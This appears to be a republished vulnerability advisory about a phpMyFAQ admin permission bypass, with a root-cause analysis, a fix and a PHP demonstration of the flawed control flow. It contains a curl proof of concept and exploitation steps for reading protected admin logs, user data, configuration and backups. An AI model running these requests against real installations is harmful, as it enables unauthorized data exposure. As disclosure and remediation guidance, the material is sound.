phpMyFAQ, Authorization Bypass, CVE-2024-9999 (Critical)


The vulnerability exists in phpMyFAQ’s `AbstractAdministrationController::userHasPermission()` method. The parent `AbstractController::userHasPermission()` correctly throws a `ForbiddenException` when a user lacks a required permission. This exception would normally propagate to Symfony’s HttpKernel exception handler, stopping execution and returning an error response. However, the administration controller overrides this method and catches the exception. Inside the catch block, it calls `$response->send()` to output a “forbidden” HTML page, but does not terminate execution – no exit(), die(), return, or re-throw follows. Consequently, the calling controller method (e.g., AdminLogController::index()) continues to run, fetches protected data, renders the full template, and returns a `Response` object. The entry point `admin/index.php` then calls `$response->send()` again, appending the full protected page content after the already-sent forbidden page. Thus, any authenticated admin user – even with minimal or no permissions – receives both the forbidden notice and the complete protected data in the same HTTP response. Additionally, the generic `catch (Exception $exception)` block only logs errors without sending any response or terminating, leading to silent data leakage without any forbidden page. All 58 admin controllers extending `AbstractAdministrationController` are affected, exposing admin logs, user management, system info, configuration, backups, and more.

DailyCVE form:

Platform: phpMyFAQ
Version: <=3.2.5
Vulnerability: Permission Bypass
Severity: Critical
Date: 2024-03-15

Prediction: 2024-04-01

What Undercode Say:

```bash
# Simulate limited admin login
curl -c cookies.txt -d 'faqusername=limited_admin&faqpassword=test&pmf-csrf-token=TOKEN' \
  'https://TARGET/admin/?action=login'
# Access admin log page (needs STATISTICS_ADMINLOG)
curl -b cookies.txt -s 'https://TARGET/admin/statistics/admin-log' | tee response.html
# Check for both forbidden message and actual log data
grep -c 'You are not allowed' response.html
grep -c 'loggingData' response.html
# Access system information (needs CONFIGURATION_EDIT)
curl -b cookies.txt -s 'https://TARGET/admin/system-information' | grep -E 'phpinfo|Server API'
```

Exploit:

Authenticate as any admin user, then directly request any protected admin endpoint (e.g., /admin/statistics/admin-log, /admin/user/user-management, /admin/configuration/backup). The response will contain the “forbidden” page followed by the full sensitive data. No special privileges required.

Protection from this CVE

Add `exit;` after `$response->send();` in the `ForbiddenException` catch block, and re-throw `$exception` in the generic catch block. Alternatively, remove the override entirely and let the parent method’s exception propagate to Symfony’s WebExceptionListener.
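The control-flow defect and the recommended fix, as an added PHP illustration that is not phpMyFAQ's own code: the `Response` stub, the `AbstractController` stand-in and the `adminLogAction()` routine are assumptions made so the two overrides can be run side by side; the permission name is the one the page cites.

```php
<?php
// Added illustration, not phpMyFAQ's source: minimal stand-ins so the control flow runs alone.
class ForbiddenException extends Exception {}
class Response {
    public function __construct(private string $body) {}
    public function send(): void { echo $this->body; }
}
// Stand-in for AbstractController::userHasPermission(): throws on a missing permission.
abstract class AbstractController {
    public function __construct(protected array $granted) {}
    public function userHasPermission(string $perm): void {
        if (!in_array($perm, $this->granted, true)) {
            throw new ForbiddenException("missing permission $perm");
        }
    }
}
// Vulnerable override: sends the forbidden page but never stops the caller.
class VulnerableAdminController extends AbstractController {
    public function userHasPermission(string $perm): void {
        try {
            parent::userHasPermission($perm);
        } catch (ForbiddenException $e) {
            (new Response("<p>Forbidden</p>\n"))->send();  // no exit, return or rethrow
        } catch (Exception $e) {
            error_log($e->getMessage());                   // no response at all: silent leak
        }
    }
}
// Hardened override per the advisory: exit after the forbidden page, re-throw anything else.
class FixedAdminController extends AbstractController {
    public function userHasPermission(string $perm): void {
        try {
            parent::userHasPermission($perm);
        } catch (ForbiddenException $e) {
            (new Response("<p>Forbidden</p>\n"))->send();
            exit;
        } catch (Exception $e) {
            throw $e;
        }
    }
}
// Hypothetical action mirroring the affected controllers: check, then fetch and render.
function adminLogAction(AbstractController $c): Response {
    $c->userHasPermission('STATISTICS_ADMINLOG');
    return new Response("<table>protected admin log rows</table>\n");
}
// Constructed input: an admin user holding no permissions at all.
adminLogAction(new VulnerableAdminController([]))->send(); // forbidden page AND the data
adminLogAction(new FixedAdminController([]))->send();      // forbidden page only, then exit
```

Running the script prints the forbidden page followed by the protected rows for the vulnerable class, and the forbidden page alone for the fixed class, which is exactly the difference a tester looks for in the HTTP response.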

Impact

Any authenticated admin user can read all admin logs (IPs, actions, usernames), access full user management (emails, permissions), retrieve system information (PHP config, database details, server paths), view all application settings (including security keys), and download database backups. The entire permission system for 58 admin controllers is rendered useless, leading to complete administrative data exposure.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
